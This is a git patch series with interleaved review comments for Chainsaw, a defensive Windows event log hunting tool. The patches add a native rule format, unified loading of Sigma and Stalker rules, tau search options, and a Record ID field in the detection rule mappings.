+ let localised = if let Some(timezone) = self.inner.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + return Ok(true); + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + }; + local.with_timezone(&Utc) + } else if self.inner.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + return Ok(true); + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.inner.from { + if localised <= sd { + return Ok(true); + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.inner.to { + if localised >= ed { + return Ok(true); + } + } + } + Ok(false) + } } diff --git a/src/lib.rs b/src/lib.rs index 98bd7901..41187182 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -4,7 +4,7 @@ extern crate anyhow; pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; -pub use hunt::{Detection, Hunter, HunterBuilder}; +pub use hunt::{Hunter, HunterBuilder}; pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index b5c9d59a..2334972a 100644 --- a/src/main.rs +++ b/src/main.rs @@ -99,7 +99,7 @@ enum Command { /// Search through event logs for specific event IDs and/or keywords Search { /// A pattern to search for. - #[structopt(required_unless = "regexp")] + #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, /// The paths to search through. 
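Review bot: The aggregate threshold match in the post-processing loop compares the operands the wrong way round: `Pattern::GreaterThan(i) => (i as usize) > ids.len()` fires when the configured count exceeds the number of grouped documents, so assuming `count: '>5'` deserialises to `GreaterThan(5)` a rule meant to flag more than five events instead flags groups of fewer than five, and `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual` are inverted in the same way (`Equal` is unaffected). The `i as usize` cast also wraps a negative `i` to a huge value; comparing in `i64` avoids both problems. Separately, the per-group hash in the Rule branch skips fields that are absent, so two documents that each lack a different field but carry the same value in the other one collide into one bucket; hashing the field name alongside the value (or hashing a marker for absent fields) would keep the buckets distinct.
```rust
let n = ids.len() as i64;
let hit = match aggregate.count {
    Pattern::Equal(i) => n == i,
    Pattern::GreaterThan(i) => n > i,
    Pattern::GreaterThanOrEqual(i) => n >= i,
    Pattern::LessThan(i) => n < i,
    Pattern::LessThanOrEqual(i) => n <= i,
    _ => false,
};
// … unchanged: document/timestamp collection and Detections push …
```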
@@ -137,7 +137,7 @@ enum Command { #[structopt(long = "skip-errors")] skip_errors: bool, /// Tau expressions to search with. - #[structopt(short = "t", long = "tau")] + #[structopt(short = "t", long = "tau", number_of_values = 1)] tau: Option>, /// The field that contains the timestamp. #[structopt(long = "timestamp", requires_if("from", "to"))] @@ -242,7 +242,7 @@ fn run() -> Result<()> { let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&RuleKind::Sigma, &file) { + match load_rule(&file) { Ok(mut r) => { count += 1; rs.append(&mut r) @@ -292,12 +292,20 @@ fn run() -> Result<()> { } pb.finish(); if csv { - cli::print_csv(&detections, hunter.mappings(), local, timezone)?; + cli::print_csv( + &detections, + hunter.hunts(), + hunter.mappings(), + hunter.rules(), + local, + timezone, + )?; } else if json { cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { cli::print_detections( &detections, + hunter.hunts(), hunter.mappings(), hunter.rules(), column_width.unwrap_or(40), @@ -338,7 +346,7 @@ fn run() -> Result<()> { Command::Search { path, - pattern, + mut pattern, regexp, extension, @@ -359,9 +367,9 @@ fn run() -> Result<()> { if !opts.no_banner { print_title(); } - let mut paths = if regexp.is_some() { + let mut paths = if regexp.is_some() || tau.is_some() { let mut scratch = pattern - .as_ref() + .take() .map(|p| vec![PathBuf::from(p)]) .unwrap_or_default(); scratch.extend(path); diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index dddcca9e..37843cb8 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs 
@@ -1,15 +1,201 @@ -use serde::Deserialize; -use tau_engine::Rule as Tau; +use std::fmt; +use std::fs::File; +use std::io::Read; +use std::path::Path; + +use serde::{ + de::{self, MapAccess, Visitor}, + Deserialize, Serialize, +}; +use tau_engine::core::{ + parser::{Expression, Pattern}, + Detection, +}; + +use crate::file::Kind; + +#[derive(Clone, Debug, Deserialize)] +pub struct Aggregate { + #[serde(deserialize_with = "crate::ext::tau::deserialize_numeric")] + pub count: Pattern, + pub fields: Vec, +} + +#[derive(Clone, Debug, Deserialize)] +pub struct Container { + pub name: String, + pub format: Format, +} + +#[derive(Clone, Debug)] +pub struct Field { + pub name: String, + pub from: String, + pub to: String, + + pub container: Option, + pub visible: bool, +} + +impl<'de> Deserialize<'de> for Field { + fn deserialize(deserializer: D) -> Result + where + D: de::Deserializer<'de>, + { + struct FieldVisitor; + + impl<'de> Visitor<'de> for FieldVisitor { + type Value = Field; + + fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result { + formatter.write_str("struct Field") + } + + fn visit_map(self, mut map: V) -> Result + where + V: MapAccess<'de>, + { + let mut container = None; + let mut from = None; + let mut name = None; + let mut to = None; + let mut visible = None; + while let Some(key) = map.next_key::()? 
{ + match key.as_str() { + "name" => { + if name.is_some() { + return Err(de::Error::duplicate_field("name")); + } + name = Some(map.next_value()?); + } + "from" => { + if from.is_some() { + return Err(de::Error::duplicate_field("from")); + } + from = Some(map.next_value()?); + } + "to" => { + if to.is_some() { + return Err(de::Error::duplicate_field("to")); + } + to = Some(map.next_value()?); + } + "container" => { + if container.is_some() { + return Err(de::Error::duplicate_field("container")); + } + container = Some(map.next_value()?); + } + "visible" => { + if visible.is_some() { + return Err(de::Error::duplicate_field("visible")); + } + visible = Some(map.next_value()?); + } + _ => return Err(de::Error::unknown_field(&key, FIELDS)), + } + } + if name.is_none() && to.is_none() { + return Err(de::Error::missing_field("to")); + } + let to: String = to.ok_or_else(|| de::Error::missing_field("to"))?; + let name = name.unwrap_or_else(|| to.clone()); + let from = from.unwrap_or_else(|| to.clone()); + let container = container.unwrap_or_default(); + let visible = visible.unwrap_or_else(|| true); + Ok(Field { + name, + to, + from, + container, + visible, + }) + } + } + + const FIELDS: &'static [&'static str] = &["container", "from", "name", "to", "visible"]; + deserializer.deserialize_struct("Field", FIELDS, FieldVisitor) + } +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(untagged)] +pub enum Filter { + Detection(Detection), + #[serde(deserialize_with = "crate::ext::tau::deserialize_expression")] + Expression(Expression), +} + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum Format { + Json, +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Level { + Critical, + High, + Medium, + Low, + Info, +} + +impl fmt::Display for Level { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Critical => write!(f, "critical"), + Self::High => write!(f, "high"), 
+ Self::Medium => write!(f, "medium"), + Self::Low => write!(f, "low"), + Self::Info => write!(f, "info"), + } + } +} + +#[derive(Clone, Debug, Deserialize, Serialize)] +#[serde(rename_all = "snake_case")] +pub enum Status { + Stable, + Testing, +} + +impl fmt::Display for Status { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Stable => write!(f, "stable"), + Self::Testing => write!(f, "testing"), + } + } +} #[derive(Clone, Debug, Deserialize)] -#[serde(rename_all = "lowercase")] pub struct Rule { - pub level: String, #[serde(alias = "title")] - pub tag: String, - #[serde(flatten)] - pub tau: Tau, - + pub name: String, + pub group: String, + pub description: String, pub authors: Vec, - pub status: String, + + pub kind: Kind, + pub level: Level, + pub status: Status, + pub timestamp: String, + + pub fields: Vec, + + pub filter: Filter, + + #[serde(default)] + pub aggregate: Option, +} + +pub fn load(rule: &Path) -> crate::Result { + let mut file = File::open(rule)?; + let mut contents = String::new(); + file.read_to_string(&mut contents)?; + + let rule: Rule = serde_yaml::from_str(&contents)?; + Ok(rule) } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index b243bcbb..dce67157 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,15 +1,19 @@ use std::path::PathBuf; use std::str::FromStr; -use serde::Deserialize; +use serde::{Deserialize, Serialize}; -pub use self::chainsaw::Rule; +use crate::file::Kind as FileKind; + +pub use self::chainsaw::Rule as Chainsaw; +pub use self::sigma::Rule as Sigma; +pub use self::stalker::Rule as Stalker; pub mod chainsaw; pub mod sigma; pub mod stalker; -#[derive(Debug, Deserialize)] +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Kind { Chainsaw, 
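Review bot: In `Field`'s `visit_map`, the check `if name.is_none() && to.is_none() { return Err(de::Error::missing_field("to")); }` is dead: the very next line, `to.ok_or_else(|| de::Error::missing_field("to"))?`, produces the same error whenever `to` is absent regardless of `name`, so the first check can be dropped. The defaulting rules the deserializer implements are the part a rule author needs and they are not written down anywhere; a doc comment on `Field` such as `/// A field mapping: `to` is required; `name` and `from` default to `to`; `visible` defaults to true; `container` marks a value that must be decoded (see Format) before lookup.` would capture them. Nits: `visible.unwrap_or_else(|| true)` is `visible.unwrap_or(true)`, and `const FIELDS` is used before its declaration inside the function, which compiles but reads better placed at the top of `deserialize`.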
@@ -37,27 +41,96 @@ impl FromStr for Kind { } } -pub fn load_rule(kind: &Kind, path: &PathBuf) -> crate::Result> { +#[derive(Debug)] +pub struct Rule { + pub chainsaw: Chainsaw, + pub kind: Kind, +} + +pub fn load_rule(path: &PathBuf) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } - let rules = match kind { - Kind::Chainsaw => { - unimplemented!() - } - Kind::Sigma => match sigma::load(&path) { - Ok(rules) => rules - .into_iter() - .filter_map(|r| serde_yaml::from_value(r).ok()) - .collect(), - Err(e) => anyhow::bail!(e), - }, - Kind::Stalker => match stalker::load(&path) { - Ok(rule) => vec![rule], - Err(e) => anyhow::bail!(e), - }, + // This is a bit crude but we try all formats then report the errors... + let rules = if let Ok(rule) = chainsaw::load(&path) { + vec![Rule { + chainsaw: rule, + kind: Kind::Chainsaw, + }] + } else if let Ok(rules) = sigma::load(&path) { + rules + .into_iter() + .filter_map(|r| serde_yaml::from_value(r).ok()) + .map(|rule: Sigma| Rule { + chainsaw: Chainsaw { + name: rule.name, + group: "".to_owned(), + description: rule.description, + authors: rule.authors, + // NOTE: A fake value as this is not used for non chainsaw rules + kind: FileKind::Evtx, + level: rule + .level + .map(|l| match l.as_str() { + "critical" => chainsaw::Level::Critical, + "high" => chainsaw::Level::High, + "medium" => chainsaw::Level::Medium, + "low" => chainsaw::Level::Low, + _ => chainsaw::Level::Info, + }) + .unwrap_or_else(|| chainsaw::Level::Info), + status: rule + .status + .map(|s| match s.as_str() { + "stable" => chainsaw::Status::Stable, + _ => chainsaw::Status::Testing, + }) + .unwrap_or_else(|| chainsaw::Status::Testing), + timestamp: "".to_owned(), + + fields: vec![], + + filter: chainsaw::Filter::Detection(rule.tau.detection), + + aggregate: None, + }, + kind: Kind::Sigma, + }) + .collect() + } else if let Ok(rule) = stalker::load(&path) { + vec![Rule 
{ + chainsaw: Chainsaw { + name: rule.tag, + group: "".to_owned(), + description: rule.description, + authors: rule.authors, + // NOTE: A fake value as this is not used for non chainsaw rules + kind: FileKind::Evtx, + level: match rule.level.as_str() { + "critical" => chainsaw::Level::Critical, + "high" => chainsaw::Level::High, + "medium" => chainsaw::Level::Medium, + "low" => chainsaw::Level::Low, + _ => chainsaw::Level::Info, + }, + status: match rule.status.as_str() { + "stable" => chainsaw::Status::Stable, + _ => chainsaw::Status::Testing, + }, + timestamp: "".to_owned(), + + fields: vec![], + + filter: chainsaw::Filter::Detection(rule.tau.detection), + + aggregate: None, + }, + kind: Kind::Stalker, + }] + } else { + anyhow::bail!("failed to load rule, run the linter for more information"); }; Ok(rules) } diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index eec09e7c..478c5f3a 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -7,6 +7,21 @@ use anyhow::Result; use regex::Regex; use serde::Deserialize; use serde_yaml::{Mapping, Sequence, Value as Yaml}; +use tau_engine::Rule as Tau; + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "lowercase")] +pub struct Rule { + #[serde(alias = "title")] + pub name: String, + #[serde(flatten)] + pub tau: Tau, + + pub authors: Vec, + pub description: String, + pub level: Option, + pub status: Option, +} #[derive(Clone, Debug, Deserialize, PartialEq)] struct Detection { diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs index 7754aa00..729d0fee 100644 --- a/src/rule/stalker.rs +++ b/src/rule/stalker.rs 
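Review bot: The fallback chain in `load_rule` discards every parse error: `if let Ok(rule) = chainsaw::load(&path)` and `else if let Ok(rules) = sigma::load(&path)` throw away the `Err` values, and `filter_map(|r| serde_yaml::from_value(r).ok())` on the Sigma branch silently skips any rule document that fails to deserialize, so a rule with a typo disappears from the hunt with nothing but the generic "run the linter" message. Keeping each error in a local (`let chainsaw_err = match chainsaw::load(&path) { Ok(rule) => return Ok(vec![…]), Err(e) => e };`) and including them in the final `anyhow::bail!` would make the failure actionable. The level and status conversion is lenient in a way that matters for triage: an unrecognised `level` string becomes `chainsaw::Level::Info` and an unrecognised `status` becomes `Testing`, which silently downgrades the severity a detection is reported with — returning an error for the unknown case, or at least a comment stating that the downgrade is intentional, would be safer. That conversion is also duplicated verbatim between the Sigma and Stalker branches; `impl FromStr for chainsaw::Level` / `chainsaw::Status` would give both branches one source of truth.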
@@ -5,27 +5,14 @@ use std::path::Path; use serde::Deserialize; use tau_engine::Rule as Tau; -use crate::rule::Rule; - -#[derive(Clone, Deserialize)] -pub struct Stalker { - tag: String, - tau: Tau, - level: String, - status: String, - authors: Vec, -} - -impl From for Rule { - fn from(stalker: Stalker) -> Self { - Self { - tag: stalker.tag, - level: stalker.level, - status: stalker.status, - tau: stalker.tau, - authors: stalker.authors, - } - } +#[derive(Clone, Debug, Deserialize)] +pub struct Rule { + pub tag: String, + pub tau: Tau, + pub description: String, + pub level: String, + pub status: String, + pub authors: Vec, } pub fn load(rule: &Path) -> crate::Result { @@ -33,6 +20,6 @@ pub fn load(rule: &Path) -> crate::Result { let mut contents = String::new(); file.read_to_string(&mut contents)?; - let stalker: Stalker = serde_yaml::from_str(&contents)?; - Ok(Rule::from(stalker)) + let rule: Rule = serde_yaml::from_str(&contents)?; + Ok(rule) } diff --git a/src/search.rs b/src/search.rs index 1a887f79..19a016f6 100644 --- a/src/search.rs +++ b/src/search.rs @@ -135,6 +135,9 @@ impl<'a> Iterator for Iter<'a> { if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { continue; } + if self.searcher.regex.len() == 0 { + return Some(Ok(r.data)); + } } if r.matches(&self.searcher.regex) { return Some(Ok(r.data)); From af8d2c9be93aa5ef2c45de48fa92d8b61b1ade14 Mon Sep 17 00:00:00 2001 
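Review bot: `self.searcher.regex.len() == 0` in the search.rs hunk is better written `self.searcher.regex.is_empty()` (clippy's `len_zero`), and since the condition depends only on the searcher rather than on the record it reads as something to decide once rather than inside the per-record loop. The loop body that contains this check starts and ends outside the hunk, so I cannot see the surrounding `if` it sits in.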
From: Alex Kornitzer Date: Sat, 4 Jun 2022 20:19:04 +0100 Subject: [PATCH 07/77] feat: add in record id by default for evtx --- Cargo.lock | 2 +- Cargo.toml | 2 +- mappings/sigma-event-logs.yml | 27 +++++++++++++++++++ rules/account_tampering/new_user_created.yml | 2 ++ .../user_added_to_global_group.yml | 2 ++ .../user_added_to_local_group.yml | 2 ++ .../user_added_to_universal_group.yml | 2 ++ rules/antivirus/f-secure.yml | 2 ++ rules/antivirus/kaspersky.yml | 2 ++ rules/antivirus/sophos.yml | 2 ++ rules/antivirus/windows_defender.yml | 2 ++ rules/lateral_movement/batch_logon.yml | 2 ++ rules/lateral_movement/interactive_logon.yml | 2 ++ rules/lateral_movement/network_logon.yml | 2 ++ rules/lateral_movement/rdp_logon.yml | 2 ++ rules/lateral_movement/service_logon.yml | 2 ++ rules/lateral_movement/unlock_logon.yml | 2 ++ .../security_audit_log_was_cleared.yml | 2 ++ .../log_tampering/system_log_was_cleared.yml | 2 ++ rules/login_attacks/account_brute_force.yml | 2 ++ rules/service_tampering/event_log.yml | 2 ++ 21 files changed, 65 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index c39bbc6d..2bb4d423 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.1" +version = "2.0.0-alpha.2" dependencies = [ "aho-corasick 0.7.18", "anyhow", diff --git a/Cargo.toml b/Cargo.toml index e8d33b64..29a50672 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.1" +version = "2.0.0-alpha.2" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 8d6d1c3d..c24a503a 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml 
@@ -23,6 +23,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -54,6 +57,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -95,6 +101,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -117,6 +126,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -139,6 +151,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -164,6 +179,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -187,6 +205,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -213,6 +234,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
@@ -232,6 +256,9 @@ groups:
 - name: Event ID
 from: EventID
 to: Event.System.EventID
+ - name: Record ID
+ from: EventRecordID
+ to: Event.System.EventRecordID
 - name: Computer
 from: Computer
 to: Event.System.Computer
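Review bot: `Event.System.EventRecordID` is a sequence number scoped to the log it was read from, so a comment on the first `Record ID` entry (e.g. `# per-log record number; pair with Computer and the source channel to pivot back to the event`) would stop analysts from treating the new column as a global identifier. The same three lines are repeated across all nine groups in this file; if the mapping parser honours YAML anchors, defining the shared System fields once and aliasing them would keep additions like this one in a single place, and if it does not, a comment saying so would explain the duplication.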
diff --git a/rules/account_tampering/new_user_created.yml b/rules/account_tampering/new_user_created.yml
index b819c13d..3cd5844d 100644
--- a/rules/account_tampering/new_user_created.yml
+++ b/rules/account_tampering/new_user_created.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/account_tampering/user_added_to_global_group.yml b/rules/account_tampering/user_added_to_global_group.yml
index ab3c63cd..ef556794 100644
--- a/rules/account_tampering/user_added_to_global_group.yml
+++ b/rules/account_tampering/user_added_to_global_group.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/account_tampering/user_added_to_local_group.yml b/rules/account_tampering/user_added_to_local_group.yml
index e781bba3..8af797ea 100644
--- a/rules/account_tampering/user_added_to_local_group.yml
+++ b/rules/account_tampering/user_added_to_local_group.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/account_tampering/user_added_to_universal_group.yml b/rules/account_tampering/user_added_to_universal_group.yml
index 0d210df6..bed52b27 100644
--- a/rules/account_tampering/user_added_to_universal_group.yml
+++ b/rules/account_tampering/user_added_to_universal_group.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/antivirus/f-secure.yml b/rules/antivirus/f-secure.yml
index 4eee3ec2..20fde701 100644
--- a/rules/antivirus/f-secure.yml
+++ b/rules/antivirus/f-secure.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: Threat Name
diff --git a/rules/antivirus/kaspersky.yml b/rules/antivirus/kaspersky.yml
index 4a56c7ce..e466e989 100644
--- a/rules/antivirus/kaspersky.yml
+++ b/rules/antivirus/kaspersky.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: Threat Name
diff --git a/rules/antivirus/sophos.yml b/rules/antivirus/sophos.yml
index 58fb3742..db54ef2a 100644
--- a/rules/antivirus/sophos.yml
+++ b/rules/antivirus/sophos.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: Threat Type
diff --git a/rules/antivirus/windows_defender.yml b/rules/antivirus/windows_defender.yml
index 5125b1b4..b5931982 100644
--- a/rules/antivirus/windows_defender.yml
+++ b/rules/antivirus/windows_defender.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/batch_logon.yml b/rules/lateral_movement/batch_logon.yml
index fe0175eb..a22e15c3 100644
--- a/rules/lateral_movement/batch_logon.yml
+++ b/rules/lateral_movement/batch_logon.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/interactive_logon.yml b/rules/lateral_movement/interactive_logon.yml
index b83dfab0..4f356a58 100644
--- a/rules/lateral_movement/interactive_logon.yml
+++ b/rules/lateral_movement/interactive_logon.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/network_logon.yml b/rules/lateral_movement/network_logon.yml
index 51fbe425..2a0c84ff 100644
--- a/rules/lateral_movement/network_logon.yml
+++ b/rules/lateral_movement/network_logon.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/rdp_logon.yml b/rules/lateral_movement/rdp_logon.yml
index ecdcfa6c..6b30d410 100644
--- a/rules/lateral_movement/rdp_logon.yml
+++ b/rules/lateral_movement/rdp_logon.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/service_logon.yml b/rules/lateral_movement/service_logon.yml
index 3823b34c..3a445b98 100644
--- a/rules/lateral_movement/service_logon.yml
+++ b/rules/lateral_movement/service_logon.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/lateral_movement/unlock_logon.yml b/rules/lateral_movement/unlock_logon.yml
index 50b74080..74ab79a8 100644
--- a/rules/lateral_movement/unlock_logon.yml
+++ b/rules/lateral_movement/unlock_logon.yml
@@ -14,6 +14,8 @@ status: stable
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/log_tampering/security_audit_log_was_cleared.yml b/rules/log_tampering/security_audit_log_was_cleared.yml
index 9581ff8e..bd010f2f 100644
--- a/rules/log_tampering/security_audit_log_was_cleared.yml
+++ b/rules/log_tampering/security_audit_log_was_cleared.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/log_tampering/system_log_was_cleared.yml b/rules/log_tampering/system_log_was_cleared.yml
index 6d52a275..a3a6ad6c 100644
--- a/rules/log_tampering/system_log_was_cleared.yml
+++ b/rules/log_tampering/system_log_was_cleared.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: Computer
 to: Event.System.Computer
 - name: User
diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml
index 9935fe9e..0f1debec 100644
--- a/rules/login_attacks/account_brute_force.yml
+++ b/rules/login_attacks/account_brute_force.yml
@@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated
 fields:
 - name: Event ID
 to: Event.System.EventID
+ - name: Record ID
+ to: Event.System.EventRecordID
 - name: User
 to: Event.EventData.TargetUserName
diff --git a/rules/service_tampering/event_log.yml b/rules/service_tampering/event_log.yml
index c4da7a36..54c9414c 100644
--- a/rules/service_tampering/event_log.yml
+++ b/rules/service_tampering/event_log.yml @@ -15,6 +15,8 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID - name: Computer to: Event.System.Computer - name: Service Name From a8724b91a0303a4f4d72cf6e63a70aad66dbfc94 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 4 Jun 2022 20:21:58 +0100 Subject: [PATCH 08/77] feat: don't add record id for brute force --- rules/login_attacks/account_brute_force.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/login_attacks/account_brute_force.yml b/rules/login_attacks/account_brute_force.yml index 0f1debec..9935fe9e 100644 --- a/rules/login_attacks/account_brute_force.yml +++ b/rules/login_attacks/account_brute_force.yml @@ -15,8 +15,6 @@ timestamp: Event.System.TimeCreated fields: - name: Event ID to: Event.System.EventID - - name: Record ID - to: Event.System.EventRecordID - name: User to: Event.EventData.TargetUserName From 81c022e47b0931f5c2e5b5a6f8f93ac7306d67d3 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Mon, 6 Jun 2022 11:46:29 +0100 Subject: [PATCH 09/77] feat: wire in complex mapping extraction --- Cargo.lock | 1 + Cargo.toml | 1 + src/cli.rs | 72 ++++++--------- src/hunt.rs | 210 +++++++++++++++++++++++++------------------ src/main.rs | 10 +-- src/rule/chainsaw.rs | 2 +- 6 files changed, 154 insertions(+), 142 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 2bb4d423..0616c4fe 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -165,6 +165,7 @@ dependencies = [ "colour", "evtx", "indicatif", + "once_cell", "paste", "prettytable-rs", "rayon", diff --git a/Cargo.toml b/Cargo.toml index 29a50672..e0805f78 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -17,6 +17,7 @@ chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" evtx = "0.7" indicatif = "0.16" +once_cell = "1.0" prettytable-rs = "0.8" rayon = "1.5" regex = "1.5" diff --git a/src/cli.rs 